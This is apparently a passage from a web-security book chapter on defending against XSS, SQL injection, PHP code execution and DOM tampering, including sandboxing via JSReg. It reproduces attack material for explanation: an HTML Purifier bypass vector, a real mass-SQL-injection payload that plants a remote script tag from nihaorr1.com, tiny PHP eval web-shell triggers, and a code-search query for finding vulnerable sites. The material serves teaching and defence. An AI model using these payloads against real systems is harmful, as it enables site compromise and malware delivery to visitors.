Chapter 9. Mitigating bypasses and attacks
Information in this chapter:
• Protecting Against Code Injections
• Protecting the DOM
Abstract
Thus far in this book, the discussion has centered on how to break existing filters, create strings that bypass firewall and filter rules, and trick devices into doing things they are not supposed to do. Throughout this discussion, the focus has been on offensive computing, as opposed to defensive computing and protection, with the idea being that it is more beneficial to developers to know how to attack a Web application than it is to blindly learn how to defend it. In this chapter, the authors deviate from the course a bit and focus on defensive computing. In particular, the authors teach and discuss best practices that you can use to harden and secure Web applications a bit more thoroughly than what blogs and tutorials generally teach. In addition to explaining how to protect against code injections (including server-side injections), they discuss how to protect the DOM, detect arrays, and proxy functions.
Key words: Code injection, HTML injection, Cross-site scripting, Markdown, Sandboxing, Proxying
In the preceding chapters of this book, we discussed how to break existing filters, create strings that bypass firewall and filter rules, and trick devices into doing things they are not supposed to do. We discussed how to execute JavaScript with CSS, how to create and execute nonalphanumeric JavaScript code, and how to combine all of these with server- and client-side databases to identify the numerous ways in which attackers can execute code, even on systems that are supposed to be secure. Throughout this discussion, our focus has been on offensive computing, as opposed to defensive computing and protection. We, the authors of this book, believe that knowing how to attack a Web application is very important—more important than blindly learning how to defend it. We also believe there is no best way to protect Web applications from being attacked and from suffering the impact of those attacks.
Web applications are complex. Some are so complex that they require large teams comprising upward of 50 people working on them every day, adding new features, fixing bugs, and testing, maintaining, and browsing the stats. It is almost impossible to find a golden path toward secure applications in this manner. Many features require unique solutions, some of which are very hard to test or even understand. Even small applications can be complex enough that it is not unusual for them to be quite buggy. According to Steve McConnell, in his book Code Complete (http://cc2e.com/), there can be anywhere from 15 to 50 bugs per 1000 lines of code on average in industry-level software products (http://amartester.blogspot.com/2007/04/bugs-per-lines-of-code.html). It is impossible to create software without bugs, and the more complexity we are faced with, the more problems and errors we can expect.
Despite all these, we, the authors, decided to include in this book a chapter focusing on defense. We did this for many reasons. The first reason is to teach and discuss best practices that you can use to harden and secure Web applications a bit more thoroughly than what blogs and tutorials generally teach. As a matter of fact, a lot of publicly available examples showing how to build certain Web application features are incredibly buggy and insecure, including countless blog posts, comments, and code examples in the PHP documentation (www.php.net/manual/en/), and even tutorials on securing Web applications. For example, in late 2009, Alex Roichman and Adar Weidman proved that the regular expressions shown in the Open Web Application Security Project (OWASP) Validation Regex Repository (www.owasp.org/index.php/OWASP_Validation_Regex_Repository) were vulnerable to denial-of-service attacks.
This chapter discusses best practices for securing Web applications and pinpoints common mistakes developers tend to make in this regard. This will be interesting knowledge for both developers and attackers who have no development background, and thus often do not know how Web developers think and work. This is often half the battle in terms of finding Web application bugs in a more efficient manner. Experienced penetration testers and attackers often just have to see a particular feature to know that it is vulnerable—or is likely to be vulnerable.
We start with a discussion of general code injections—cross-site scripting attacks as well as code injections and similar attacks.
Protecting against code injections
Code injections can occur on all layers of a Web application and can include everything from DOM injections and DOM cross-site scripting, to classic markup injections, CSS injections, and code execution vulnerabilities on the server-side layer, to attacks against the database or even the file system via path and directory traversal and local file inclusions. There is not a single layer in a complex Web application in which an attacker cannot use strings or similar data to cause trouble and interfere with the expected execution flow and business logic. In this section, we do not focus on securing every layer of a Web application; other books are already available that discuss Web security and hardening Web applications against attacks of all kinds. Instead, we focus on best practices and interesting tools that can help us to harden a Web application, discuss how to deal with the consequences of a successful attack, and delve into details regarding the attack surface of a Web application.
HTML injection and cross-site scripting
One of the most common attack scenarios concerns exploitation of the display of unfiltered user input—coming in via GET, POST, COOKIE, or other client-to-server messages that the user can influence manually or with a tool. In this scenario, an attacker has to check where his input is being reflected and which characters the Web application filter is allowing. Sometimes there is no filter at all; sometimes the filter just encodes or strips certain characters or strings; and sometimes the filter uses a complex validation mechanism that has knowledge about the context in which the input is being reflected and then executed. The term context is important in this discussion. It is easy to harden a Web application against user input that could result in markup injections or cross-site scripting and JavaScript execution. A developer would just have to make sure each incoming string is encoded to HTML entities before being reflected. This approach would work perfectly, as long as the attacker does not have the ability to inject input into an HTML element's attributes, because the browser decodes HTML entities at that location (as we learned in Chapter 2). However, a complex Web application cannot just rigorously encode all incoming data to entities. Sometimes the Web site owner wishes to allow users to use HTML for text formatting; other times an abstraction layer for creating HTML text, such as BBCode (www.bbcode.org/) or a similar markdown dialect, is being used.
Markdown is a markup language abstraction layer that is supposed to provide a limited and easy-to-use set of text formatting helpers. Several dialects and variations of markdown exist, and are used in the MediaWiki software, Trac, many bulletin boards such as phpBB and vBulletin, as well as blogs and wikis.
More information on markdown is available at http://daringfireball.net/projects/markdown/.
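As a minimal sketch of the entity-encoding defense described above (the function name and the exact character list are our own illustration, not tied to any particular framework), the idea looks roughly like this:

```javascript
// Naive output-encoding sketch: convert the characters that are
// significant in HTML markup into their entity equivalents before
// reflecting user input. Note that this is only appropriate for HTML
// text and quoted-attribute contexts, not for script, style, or URL
// contexts, which need their own encoding rules.
function encodeForHtml(input) {
  return String(input)
    .replace(/&/g, '&amp;')   // must run first, or later entities get double-encoded
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

console.log(encodeForHtml('<script>alert(1)</script>'));
// &lt;script&gt;alert(1)&lt;/script&gt;
```

The ampersand replacement has to come first; otherwise the `&` produced by the other replacements would itself be re-encoded.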
In this situation, a developer is faced with a dilemma: Either the user can submit HTML, and thus the whole Web application will be rendered vulnerable to cross-site scripting or worse; or the requirement cannot be fulfilled, resulting in sad users and Web site owners. What is necessary in this case is an easy-to-describe but difficult-to-build layer between the Web application and the user-generated data. A tool with this capability would know all about HTML, browsers, and rendering quirks. It would be able to decide whether the submitted HTML is harmless or potentially dangerous; even fragments of dangerous HTML could be detected and, in the best case, removed. Chapter 2 should have taught you that this feat is quite challenging. Still, many developers have faced this challenge and attempted to create “aware” filtering tools. Google uses such a filter, and from what we, the authors, could see during our research, it is pretty tight and almost invincible. Microsoft also has a solution, called Safe HTML, which works quite well too. Meanwhile, PHP developers should investigate the HTML Purifier (http://htmlpurifier.org/) and Java folks should look into the OWASP AntiSamy project (www.owasp.org/index.php/Category:OWASP_AntiSamy_Project).
In essence, each of these tools parses the user-submitted markup and checks for tag-attribute combinations that could execute JavaScript code, interfere with client-side layout rendering such as base or meta tags, or embed arbitrary sources via object, applet, iframe, and embed.
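To convey the principle only (this is emphatically not how HTML Purifier or AntiSamy are implemented; production tools parse the markup properly and also validate attributes, rather than pattern-matching tags), a toy whitelist filter might look like this:

```javascript
// Toy tag whitelist: any tag not on the known-good list is entity-encoded
// instead of being kept as markup. A real sanitizer builds a parse tree,
// checks attributes, and rebuilds the output; this regex sketch only
// illustrates the whitelisting idea.
const ALLOWED_TAGS = new Set(['b', 'i', 'em', 'strong', 'p', 'br']);

function naiveWhitelist(html) {
  return html.replace(/<\/?([a-zA-Z0-9]+)[^>]*>/g, function (tag, name) {
    return ALLOWED_TAGS.has(name.toLowerCase())
      ? tag                                                // known good: keep
      : tag.replace(/</g, '&lt;').replace(/>/g, '&gt;');   // unknown: neutralize
  });
}

console.log(naiveWhitelist('<b>hi</b><script>alert(1)</script>'));
// <b>hi</b>&lt;script&gt;alert(1)&lt;/script&gt;
```

Note that even this sketch keeps attributes on allowed tags untouched, which is exactly the kind of gap (event handlers, style attributes) that real sanitizers must close.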
Many of these tools are also capable of parsing CSS to make sure no evil styles can be smuggled into the submitted markup. The tools do this via whitelisting. In essence, the tools contain a list of known-good markup; anything that is not on this list is stripped or manipulated to prevent any negative effects. (By the way, blacklists would fail at this task, since there are endless combinations of invalid or unknown tags and XML dialects for generating code executing JavaScript or worse.) HTML Purifier even completely rebuilds the user-submitted markup after analysis to make sure an attacker cannot use encoding tricks and other behavior to inject bad code, as we discussed in Chapters 2, 3, and 5. Nevertheless, bypasses sometimes do exist because user agents do not follow the defined standards for working markup. A recently discovered bypass that works against HTML Purifier and Internet Explorer 8 looks like this:
<a style="background:url(/)!!x:expression(write(1));">lo</a>
In the preceding code, the vector abused a parser bug in IE8 and earlier that is connected to the exclamation mark in the middle of the vector. HTML Purifier did everything correctly, but had no knowledge of the parser bug. This immediately rendered many Web applications vulnerable to cross-site scripting, and even bypassed PHPIDS attack detection in some scenarios since it relies on HTML Purifier too.
CSS parsers are, by design, very error-tolerant. This is due to the extensible nature of the CSS styling language. If the parser comes across an element in a stylesheet that it does not recognize, it should continue until it finds the next recognizable element. In the past, this led to many severe security problems that affected all browsers. Arbitrary garbage followed by a {} sequence will make most CSS parsers believe valid CSS is present.
Cross-site scripting attacks are not the only danger resulting from abusing a browser's CSS parser. Severe information theft is also possible, as described in the paper “Protecting Browsers from Cross-Origin CSS Attacks” by Lin-Shung Huang, Zack Weinberg, Chris Evans, and Colin Jackson (see http://websec.sv.cmu.edu/css/css.pdf).
This problem was partially resolved in HTML Purifier 4.1.0 and fully resolved in HTML Purifier 4.1.1. So, as you can see, the task of cleaning markup of bad input is difficult to almost impossible. Too many layers are included in the process of submitting, reflecting, and processing user-generated markup. And not only must the filtering solution be equipped with knowledge regarding what HTML is capable of but also it is important to know about bugs, glitches, and proprietary features in the user agents rendering the resultant markup.
But, of course, there is more to Web application security and code injection than just client-side reflected code via bad server-side filters. Let us look at some of the protection mechanisms that are available to protect server runtimes such as PHP and the database.
Server-side code execution
There are dozens of techniques and even more attack scenarios and vulnerability patterns when it comes to executing code on the server via vulnerabilities in a Web application. In this section, we revisit those we discussed in Chapters 6 and 7.
SQL
The topic of SQL injections is vast, and there is a lot more to learn about it than what we have the space to cover here. For more information on SQL injection, see Justin Clarke's book, SQL Injection Attacks and Defense (ISBN: 978-1-59749-424-3, Syngress), as well as any of the numerous online tutorials that teach how to secure Web applications against SQL injections, perform SQL injections, avoid filter mechanisms, and defeat the signatures of Web application firewalls (WAFs). In addition, several good SQL injection cheat sheets are available, some of which we covered in Chapter 7. Also, a variety of tools are available to attackers and penetration testers for testing Web applications against SQL injections. These include the free and open source sqlmap (http://sqlmap.sourceforge.net/) and sqlninja (http://sqlninja.sourceforge.net/), and the commercial tool Pangolin (www.nosec.org/), which some say is the best and most aggressive tool on the market. Rumor has it that the free test version of Pangolin is backdoored; this was discussed on the Full Disclosure mailing list in early 2008 (http://seclists.org/fulldisclosure/2008/Mar/510).
SQL injections are a very common and persistent problem, with sometimes dire consequences. Depending on the attacked system and the underlying database management system (DBMS), the consequences can range from heavy information disclosure to denial of service and even remote code execution on the attacked box.
Also, if the SQL injection vulnerability occurred in a popular third-party software product, attackers could easily turn it into a mass SQL injection attack by simply using Google to locate other Web sites that use the affected software and shooting malicious queries at all of them.
Once a SQL injection vulnerability has been spotted on a specific Web site, the attacker can take a lot of time probing and disclosing important information about the DBMS, the currently installed version, and most importantly, the set of privileges the database is running with to determine what to do next and how to accomplish her goals. If the attacked system is protected with a WAF that, for example, will not allow easy probing attempts such as the common string ' OR 1=1 --, or similar vectors, the attacker does not have to give up, because now the real fun begins. The fact that SQL is extremely flexible in its syntax due to its comparably simple nature leads to the possibility of obfuscating the attack vector to the max. We saw many examples of how to do this in Chapter 7. A good indication that a WAF is present is if an attacker submits the aforementioned string and the server responds with a result such as the 406 status code, "Not Acceptable."
A tool called wafw00f is available that helps to fingerprint WAFs in case an attacker suspects a WAF is present. The tool fires several easy-to-detect vectors against the targeted Web application and inspects the resultant response, both the header and the body. If the response matches several stored patterns, the tool tries to calculate the probability that a WAF is being used. Most of the time the results are pretty precise. You can find the tool at http://code.google.com/p/waffit/.
The attacker would then vary the attack vector a bit; for example, she may try using MySQL-specific code or other obfuscation methods such as nested conditions or internal functions to generate the necessary strings and values. Since SQL is flexible, there will always be a way to get around the string analysis and filtering methods of the installed WAF or filter solution. Use of the term always in the preceding sentence might raise a few eyebrows, but so far none of the products we, the authors, tested while writing this book were able to catch all SQL injection attempts. At some point, all WAFs failed; even the heavily maintained PHPIDS is not remotely capable of catching all SQL injection attempts and has been regularly fooled by researchers such as Roberto Salgado and Johannes Dahse (http://sla.ckers.org/forum/read.php?12,30425,page=29).
So, the only way the developer of a Web application can protect the application against SQL injections is by not making any mistakes and not creating any vulnerabilities. Fortunately, there are some techniques a developer can use to make this task a bit easier. One of them is to use parameter binding, and thereby avoid concatenating strings while building the query. Concatenation-based bugs are the most common SQL injection vulnerabilities out there at the time of this writing, but few incidents have been reported in which applications were affected that used proper binding methods. PHP and many other languages provide libraries that enable easy use of parameter binding for building SQL queries, and it is not hard to test and implement. If you cannot get around concatenation, you should use proper filtering and escaping methods. PHP's mysql_real_escape_string() does a good job and works quite reliably, since it takes the connection's character set into account; the older mysql_escape_string() does not, and should be avoided.
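To illustrate why binding beats concatenation, here is a deliberately simplified sketch (the `bind` helper and its escaping rule are our own illustration; real drivers such as PDO or mysqli send the query structure and the parameter values to the server separately rather than splicing them together):

```javascript
// Concatenation: attacker-controlled input becomes part of the SQL code.
function unsafeQuery(name) {
  return "SELECT * FROM users WHERE name = '" + name + "'";
}

// Binding sketch: placeholders keep the query structure fixed, and the
// values are treated strictly as data. Real prepared statements do the
// separation on the server side; this emulation only conveys the idea.
function bind(sql, params) {
  let i = 0;
  return sql.replace(/\?/g, function () {
    const value = String(params[i++]);
    return "'" + value.replace(/'/g, "''") + "'"; // SQL string-literal escaping
  });
}

// The classic probe stays inert: the quote is doubled, not interpreted.
console.log(bind("SELECT * FROM users WHERE name = ?", ["' OR 1=1 --"]));
// SELECT * FROM users WHERE name = ''' OR 1=1 --'
```

With `unsafeQuery`, the same input would terminate the string literal and append live SQL; with binding, the query's structure cannot be changed by any parameter value.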
Another way to go is with stored procedures and functions, whereby the developer can outsource a lot of application logic directly to the DBMS. The MySQL documentation calls them stored routines and provides good information on them in the reference docs (see http://dev.mysql.com/doc/refman/5.1/en/stored-routines.html).
With this technique, the user-submitted data can be wrapped in variables and later used in the final query. If this is done correctly, it provides good protection against SQL injections since the attacker cannot leave the context of the mapped variable, and thus cannot break out of the query's structure and add new code. Simple and blind use of stored functions is no guarantee of a system that is safe from SQL injections, though, as illustrated in an incident that occurred in early 2008. One of the affected stored procedures looked like this:
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://nihaorr1.com/1.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
The attackers used the fact that the stored Microsoft SQL procedure used internal concatenation, and thus managed to break the code and inject their own data. The injected code was reflected on the affected Web sites and displayed a script tag loading data from a malicious URL attempting to infect the visiting users with malware: the antiquarian Microsoft Data Access Components (MDAC) exploit which, at the time of this writing, is still being sold as part of common underground exploit kits. Good write-ups on this incident are available online.
Another interesting way to protect Web applications from SQL injection attacks is to use a SQL proxy solution such as GreenSQL (www.greensql.net/). Tools such as this free open source product create a new layer between the application and the DBMS. If the application messes up the filtering job and directs potentially malicious and unsolicited SQL to the DBMS, the SQL proxy becomes the last line of defense and checks the incoming data, matches it against existing profiles and filter rules, and acts as a bridge keeper. As soon as the proxy tool judges the input to be harmless and valid it will pass it; otherwise, an error will be thrown and the DBMS will remain unaffected. The problem with solutions such as this is that, like WAFs, they are easy for attackers to fingerprint, and if an unpublished vulnerability or bypass exists, the protection mechanisms are rendered completely useless. Also, the tool itself may contain a vulnerability that leads to a bypass of the protection, or even worse. Several WAFs have fallen victim to attacks against their own backend system in the past.
So, as you can see, protecting Web applications from SQL injections with external tools might work in some cases, but definitely not in all. It is easy to advise developers to make no mistakes and bind properly, use no concatenations, and do everything right, but it is difficult for developers to actually do these things. And if third-party software is used, the Web application's security level basically relies on the expertise of the developers of the third-party software, or on thorough audits which can take weeks to months to complete in some scenarios. Furthermore, sometimes the DBMS and the runtimes are third-party solutions which can contain bugs too. So, even if the Web application and everything around it is set up properly, its security depends on factors such as the DBMS security, operating system security, and many other factors.
PHP
Creating a code execution vulnerability in PHP is not the most difficult task for an inexperienced developer to perform. And from the perspective of the attacker, PHP vulnerabilities are very attractive, since executing PHP code basically means owning the box on which it is running. Even if a thoroughly hardened server prevents a full compromise, the attacker can at least take over and control the application, perhaps neighboring applications on the same server, and the database; send spam by abusing the conquered machine's mailer; and cause heavy information disclosure and severe privacy leaks for the users of the victimized application. PHP code execution vulnerabilities are pretty easy to find; usually they incorporate several native functions in combination with unsanitized user input.
Tools such as the Google Code Search Engine facilitate the process of finding code execution vulnerabilities. An attacker just creates a search term that matches common vulnerability patterns and sees which open source third-party software is being affected. Then he simply uses the regular Google search engine to search for domains hosting the files based on the results of the first code search. At this point, the exploitation can begin, and on a large scale.
Code search engines are more dangerous than they might appear, since searching for code in general via regular expression-based patterns means searching for vulnerabilities too. To see how easy this is, and how many results even the simplest and most basic search patterns return, try the following query on the Google Code Search Engine (www.google.com/codesearch). At the time of this writing, the query returned 455 results, a large percentage of which are useful to attackers:
lang:php eval\s*\(.*\$_(GET|POST|COOKIE|REQUEST)
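The same pattern can be applied locally against any codebase; a sketch of the matching step looks like this (the file-walking logic is omitted, and the helper name is ours; only the regular expression itself comes from the query above):

```javascript
// JavaScript equivalent of the code-search pattern above: flag any
// eval() call whose argument involves request-derived superglobals.
const suspicious = /eval\s*\(.*\$_(GET|POST|COOKIE|REQUEST)/;

function looksVulnerable(phpSource) {
  return suspicious.test(phpSource);
}

console.log(looksVulnerable("<?php eval($_GET['cmd']); ?>"));        // true
console.log(looksVulnerable("<?php echo htmlspecialchars($x); ?>")); // false
```

A grep-style scan like this produces false positives and misses indirect flows, but as the search-engine numbers show, even the crudest pattern surfaces plenty of real bugs.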
It may sound too easy to be true, but this really is what happens. Most of the attacks recorded in the php-ids.org Web site's attack logs indicate that the attackers' goal was code execution using the simplest vectors. Often, the already infected machines are being used to scan the Web for more machines to infect, all via an initial PHP code execution vulnerability. Remember, the attacker can do everything the attacked application can do, including sending e-mails, scanning the Internet, sending requests to other Web sites, and more.
The easiest way for a developer to create a code execution vulnerability is to combine include and require statements with user input. Imagine a piece of code such as include 'templates/'.$_GET['template'].'.tpl';. If the PHP runtime is not very well configured, this example can be exploited as a code execution vulnerability. In the worst-case scenario, the attacker can cut the string by using a null-byte and do a path traversal to another file located on the attacked server. If this file contains PHP code controlled by the attacker, the potential code execution vulnerability will be completely exploitable.
Infecting an arbitrary file on the attacked server with attacker-controlled PHP code is also easier than you might think. Consider, for example, uploads of PHP code in GIF comments or just plain-text files, PDF files, or Word documents; or perhaps log files, error logs, and other application-generated files. Some attackers claim to have used the mail logs generated by a Web site's mailer, or the raw database files in some situations. Also consider the data URIs and PHP wrappers we discussed in Chapter 6; these were also very interesting and promising ways to infect a file with attacker-controlled PHP code. The code such a file should contain can be very small; basically, just a small trigger to evaluate arbitrary strings, such as <?eval($_GET[_]);. In just 17 characters, an attacker can execute arbitrary code, just by filling the GET parameter _ with, for example, echo 'hello'; or, more likely, something worse. If you use back ticks, it is even possible to create shorter trigger vectors if the surrounding code allows it. Code such as <?$_GET[_](); even allows you to call arbitrary functions with 13 characters, if they do not require any parameters, and <?$_($x); as well as <?`$_`; do the same if the PHP setting register_globals is switched on. (These vectors were submitted by Twitter users @fjserna, @freddyb, and @ax330d.)
What can a developer do to protect against such attacks? The answer is simple: proper validation. Proper validation is crucial for fixing and avoiding security problems and vulnerabilities. Developers should make sure that the user-generated content is being validated strictly before hitting any critical function or feature. Let us revisit the small include example we saw earlier in this section. If the developer had made sure that only alphanumeric characters could enter the concatenated string later being processed by the include statement, everything would have been all right. This is also true for native PHP functions such as escapeshellcmd which, for some reason, is blocked by many large hosting companies, and preg_quote, which does a pretty good job of making sure no bad characters can be put into a string without being escaped with a backslash.
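Returning to the include example, that validation step can be sketched in a few lines (ported to JavaScript for illustration; the helper names are ours, and a real PHP implementation would sit in front of the include statement):

```javascript
// Whitelist validation: only alphanumeric template names may reach the
// include statement, which rules out null-bytes, slashes, and dots used
// for path traversal.
function isValidTemplateName(name) {
  return /^[a-zA-Z0-9]+$/.test(name);
}

function resolveTemplate(name) {
  if (!isValidTemplateName(name)) {
    throw new Error('invalid template parameter');
  }
  return 'templates/' + name + '.tpl';
}

console.log(resolveTemplate('welcome')); // templates/welcome.tpl
```

Because the whitelist admits only letters and digits, traversal sequences such as `../` and null-byte truncation tricks simply never reach the file system layer.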
Validation and escaping are very important, but validation is more important than escaping because input that does not pass validation no longer has to be escaped. The script will simply not let it pass, and instead will show error information or something more user-friendly. But again, we are talking about software that developers have under their control; in other words, software they, their team members, or their former coworkers wrote. As we discussed, third-party software throws a monkey wrench into the works: How can a developer know if everything in, for instance, a huge project such as phpBB or MediaWiki was done correctly? What if one of the major open source projects does not provide the features the site owner needs, and a less popular and less well-maintained solution has to be used? In these situations, it might not always be possible to conduct long and costly audits against the third-party software. Therefore, the best approach is a global filtering solution sitting right in front of the PHP code and executing scripts before the actual application does. Luckily, PHP provides such a mechanism. It is called auto_prepend_file and it is documented at http://php.net/manual/en/ini.core.php.
This mechanism allows developers to, for example, look at _GET, _POST, and other super-global variables before they hit the application, and perform some sanitation work for the sake of better security. One recommended action is to get rid of null-bytes; it is best to replace them with spaces or other harmless characters. Invalid Unicode characters are another group of evil chars one might want to get rid of (the whole range from \x80 to \xff if the application runs on UTF-8), because they can cause serious problems with cross-site scripting if the application uses the native PHP function utf8_decode somewhere in the guts of its business logic. Another trick is to use some predictive validation combined with auto_prepend_file. A parameter named id or containing the string _id most likely contains either a numerical value or a hexadecimal string with the characters a-f and 0-9, so why not auto-magically validate it that way? If the parameter does not contain the expected characters, the prepended file will exit and will show an error message. Chances are very good that most, if not all, third-party software you use will work well with such a restriction.
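The predictive-validation trick for id-style parameters could be sketched like this (the parameter-name heuristic and the hex rule follow the description above; the helper itself is our illustration of what a PHP auto_prepend_file script might do with $_GET and $_POST):

```javascript
// Predictive validation: parameters named "id" or ending in "_id" are
// expected to contain only numeric or hexadecimal characters. Anything
// else is rejected before the request reaches the application.
function validateParams(params) {
  for (const [key, value] of Object.entries(params)) {
    if (key === 'id' || key.endsWith('_id')) {
      if (!/^[a-fA-F0-9]+$/.test(value)) {
        return false; // a real prepend script would exit with an error page
      }
    }
  }
  return true;
}

console.log(validateParams({ user_id: '1f4', page: 'home' })); // true
console.log(validateParams({ id: '1 OR 1=1' }));               // false
```

Note how the classic injection probe fails the check immediately, while ordinary numeric and hex identifiers pass untouched.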
Securing PHP from more or less obfuscated attacks is hard and is not a task that your neighbor's son should perform for you, unless he is really good in his field of research. Sometimes code execution vulnerabilities appear where no one would ever expect them—for example, the BBCode PHP remote code execution vulnerability in the legendarily vulnerable content management system e107 (see http://php-security.org/2010/05/19/mops-2010-035-e107-bbcode-remote-php-code-execution-vulnerability).
There are many ways you can protect your PHP applications: you can forbid certain functions, use the deprecated and many times exploited and bypassed safe_mode, and set other important options in the php.ini or vhost configuration or .htaccess files around the Web application, besides following the numerous guidelines for writing secure code. But the most important things are still proper encoding, filtering, and most importantly, thorough validation. The more centralized and strict the validation, the better. Only allow the characters that are supposed to be used; the least-privilege policy reigns supreme in the world of PHP.
Now let us look at a completely different topic: protecting the DOM and other client-side entities, because at some point, Web applications will have to be able to deal with user-generated JavaScript, a task that is almost impossible to master.
Protecting the DOM
As we saw in Chapters 3 and 4, JavaScript can be obfuscated to the extreme, and the syntax is very flexible. This makes it difficult to protect JavaScript code entirely, as one little slip and you can expose access to the window or document object. To protect the DOM, we have to learn to hack it. We, the authors, started on this journey awhile ago, and at first we thought it was straightforward to protect the DOM by simply using closures and overwriting methods. Our code looked something like this:
window.alert = function(native) {
  var counter = 0;
  return function(str) {
    native(str);
    if (counter > 10) {
      window.alert = null;
    }
    counter++;
  };
}(window.alert);
The reasoning was that if we could control the original reference, we could force the function to do what we wanted: which, in the preceding example, was to enforce a limit of 10 calls. The main problem with this approach is that there are numerous ways to get the original native function. Another problem is that we are forced to go down the blacklist route; we have to specify all the native functions to protect, and if a new one is released we have to add it to our sandbox. Therefore, new JavaScript features would break our method. This is clearly demonstrated with a few lines of code; using delete we can get the native function back on Firefox:
window.alert=function(){}
delete alert;
alert(alert);//function alert() {[native code]}
Another technique on Internet Explorer is to use the top window reference to obtain the original function, as shown in the next example:
var alert = null;
top.alert(123);//works on IE8
Not giving up, we pursued another method, this time creating two windows on separate domains and using Same Origin Policy (SOP) to prevent access to the calling domain. We did this by sending the code using the location.hash feature in JavaScript and reading it from the separate domain, executing the code, and sending it back to the original domain. This seemed to work; it had some advantages, such as being able to set cookies on the domain used and the ability to redirect the user, but it was flawed. Using new windows, it was possible to break the sandbox and execute code on the parent domain. If we wanted to protect the DOM, we would have to sandbox all functions and control what the user could access.
Sandboxing
The Web has evolved since we, the authors, conducted that test, and the once-brilliant SOP is now showing its age. The policy states that content on one domain should not be accessible from another unless the two origins match. This worked great for Web applications in the 1990s and early 2000s, but as Web applications have evolved, the restrictions of SOP have become apparent. Web sites are no longer restricted to their own domains; they are combined to form mashups, in which data from one site is used by another site to create a new application. Some Web sites, such as Facebook, even accept user-created applications. This presents a problem for SOP, because if we are accepting untrusted code, how can we be sure a user is not doing something malicious with it?
To solve this problem, companies such as Google, Microsoft, and Facebook have started to develop their own sandboxes, such as Caja (http://code.google.com/p/google-caja/) and the Microsoft Web Sandbox (http://websandbox.livelabs.com/). These are designed to allow Web sites to include untrusted code and execute the code in their own environment, choosing what the code should be allowed to do.
Although this sounds great, the footprint of these systems is high, and they sometimes involve a server-side layer or a plug-in to parse the code safely. We thought this could be done with less code and just the client.
Gareth (one of the authors of this book) decided to create a regular expression sandboxing system based entirely in JavaScript. This journey started when he was writing a simple JavaScript parser that could accept untrusted code. After around 100 lines of code, he realized that instead of writing multiple if or switch statements, he could use a regular expression as a shortcut to define more than one instance or range of characters. He soon realized that it would make sense to simply match the code and rewrite it as necessary, and then let the browser execute the rewritten code. From this, JSReg was born.
JSReg is a JavaScript regular expression sandbox that performs rewriting to make untrusted JavaScript code safe (www.businessinfo.co.uk/labs/jsreg/jsreg.html).
One of the challenges of sandboxing JavaScript is the square bracket notation. Literally any expression can be placed within a pair of square brackets, and its result is used to determine which object property to access. For example, the property __parent__ returns the window object on Firefox. We cannot allow access to window, as that would expose its various methods and the ability to create global variables. Another challenge is that the square bracket notation shares its syntax with an array literal. We want to detect both, as we will perform different rewrites depending on whether the code we are examining is an array or an object accessor.
The square bracket notation in JavaScript is also called an object accessor.
Let us see how an array literal and object accessor compare.
arrayLiteral = [1,2,3];
obj = {a:123};
objAccessor = obj['b','a'];
As you can see in the preceding code, the two are very similar; the object accessor looks like an array, even though the brackets merely evaluate the comma operator. The object accessor always returns the comma operator's last operand, so we could, in effect, rewrite obj['b','a'] as obj['a'], as the string 'b' is redundant.
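A quick sketch of what the brackets actually evaluate (the variable names here are our own illustration):

```javascript
var obj = {a: 123, b: 456};

// The comma operator evaluates both operands and yields the last one,
// so the brackets below resolve to the property name 'a'.
var viaComma = obj['b', 'a'];  // same as obj['a']
var direct = obj['a'];
// viaComma === direct: both read obj.a (123); the string 'b' had no effect
```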
Detecting arrays
At first, and rather naively, we thought we could detect arrays using regular expressions. However, the main difficulty of detecting arrays in this manner is that regular expressions in JavaScript struggle to match recursive data. Any data that repeats itself will be overlapped by either greedy or lazy matching, which results in security problems and syntax errors. The lack of look-behind functionality in JavaScript's regular expressions adds to the difficulty of matching an array literal correctly. Therefore, the best way we came up with to resolve this issue was to rewrite the arrays and place markers where they occur. With this technique, @# indicates a special array marker; we chose this sequence because it is invalid syntax, so it cannot be injected maliciously. To match each opening bracket with its closing bracket, we used a simple counter that incremented when a bracket was opened and decremented when one was closed. Using this method, it is possible to detect each pair of characters by matching the innermost closing character with the most recent opening character. In addition, the left context of the match was added manually each time, so that we could inspect the characters before the opening bracket to decide whether it began an array literal or an object accessor. You can see the entire process in action via the convenient Google code interface on which JSReg is hosted (https://code.google.com/p/jsreg/source/browse/trunk/JSReg/JSReg.js?spec=svn62&r=62#897).
Once we have detected our arrays and placed the markers, we can replace them with a function call that creates an array. This successfully separates array literals from object accessors. You might be wondering why markers are used at all. The marker provides a constant that cannot be overwritten before the rewrite has been performed. If, for example, we used an ordinary identifier such as a instead of a marker, malicious code could hijack every array creation simply by supplying its own function named a. Using an invalid-syntax marker prevents this: if an attacker injects the marker himself, it is rejected as a JavaScript error when JSReg performs its syntax check.
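A minimal sketch of the counter technique described above (our own simplified version, not JSReg's actual implementation): the counter goes up on every `[`, down on every `]`, and each closing bracket is paired with the most recent unmatched opening bracket; a crude left-context test then separates accessors from array literals.

```javascript
// Pair up square brackets in a source string using a simple depth counter.
// Returns an array of [openIndex, closeIndex, depth] triples,
// innermost pairs first.
function pairBrackets(code) {
  var pairs = [];
  var stack = [];                 // indexes of currently open brackets
  for (var i = 0; i < code.length; i++) {
    var ch = code.charAt(i);
    if (ch === '[') {
      stack.push(i);              // counter goes up: remember where it opened
    } else if (ch === ']') {
      var open = stack.pop();     // counter goes down: close the latest opening
      pairs.push([open, i, stack.length]);
    }
  }
  return pairs;
}

// Crude left-context test: a bracket preceded by an identifier character,
// ')' or ']' is a property accessor; anything else is an array literal.
// (Real code must also handle whitespace, comments, and keywords.)
function isAccessor(code, openIndex) {
  return /[\w$\])]$/.test(code.slice(0, openIndex));
}

var pairs = pairBrackets("a[b[0]]"); // [[3,5,1],[1,6,0]]
```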
Look-behind allows a regular expression to look backward at the text preceding a potential match without adding that text to the match itself; the match succeeds only if the look-behind condition holds. For example, if we negatively look behind for a, our regular expression only matches when the text immediately before the match is not a.
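At the time, JavaScript had no look-behind support at all; the feature has since been added to the language, so the behavior the note describes can now be sketched directly:

```javascript
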